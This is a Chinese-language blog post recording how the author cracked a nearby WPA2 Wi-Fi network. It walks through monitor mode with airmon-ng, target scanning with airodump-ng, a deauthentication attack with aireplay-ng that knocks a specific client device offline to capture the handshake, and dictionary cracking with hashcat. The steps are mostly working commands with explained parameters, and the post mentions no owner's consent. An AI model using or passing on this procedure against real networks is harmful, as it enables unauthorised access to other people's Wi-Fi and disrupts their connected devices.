破解wifi密码记录
摘要:对一次破解wifi密码的过程进行记录
第一步
买了个无线网卡,某宝随便买了个RT3070l免驱无线网卡
第二步
vmware 中 虚拟机-》可移动设备 将 无线网卡 共享给 kali
第三步
ifconfig 查看网卡 。
如果网卡列表中没有无线网卡, ifconfig -a 看一下 是不是 网卡没有启用。没有启用的话 ifconfig wlan0 up 启用一下。
第四步
开启网卡的监听功能
airmon-ng //查看网卡是否具有监听功能。
airmon-ng start wlan0 //开启网卡的监听功能
airodump-ng wlan0mon 监听附件的wifi
使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等。
这一步会输出两个列表,两个列表不停在刷新。
第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:
BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式,我们要破解的是 WPA2
ESSID: 无线网络的名称
第二个列表表示某个无线网络中和用户设备的连接信息:
BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址
扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出
第五步
选取一个信号比较好的无线信号,获取握手包进行破解
//使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。
airodump-ng -c 7 --bssid E2:8B:91:6F:95:76 -w /root/ wlan0mon
参数解释:
-c 指定信道,上面已经标记目标热点的信道
-bssid指定目标路由器的BSSID,就是上面标记的BSSID
-w指定抓取的数据包保存的目录
//攻击指定wifi,强制对方wifi断开重连,从而获取握手包
aireplay-ng -0 5 -a E2:8B:91:6F:95:76 -c 46:31:5B:2E:19:49 wlan0mon
参数解释
-0 表示发起(鉴权)deauthentication攻击
-a 指定无限路由器BSSID
-c 指定强制断开的设备
第六步
破解抓取到的wifi握手包
抓取的握手包,需要去下面网站转换下格式https://hashcat.net/cap2hashcat/index.pl 才能在hashcat中破解
hashcat -a 0 -m 22000 转换后的握手包.hc22000 字典1.txt 字典2.txt //使用hashcat破解wifi密码
第七步
airmon-ng stop wlan0mon//关闭网卡的监听功能
参考
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。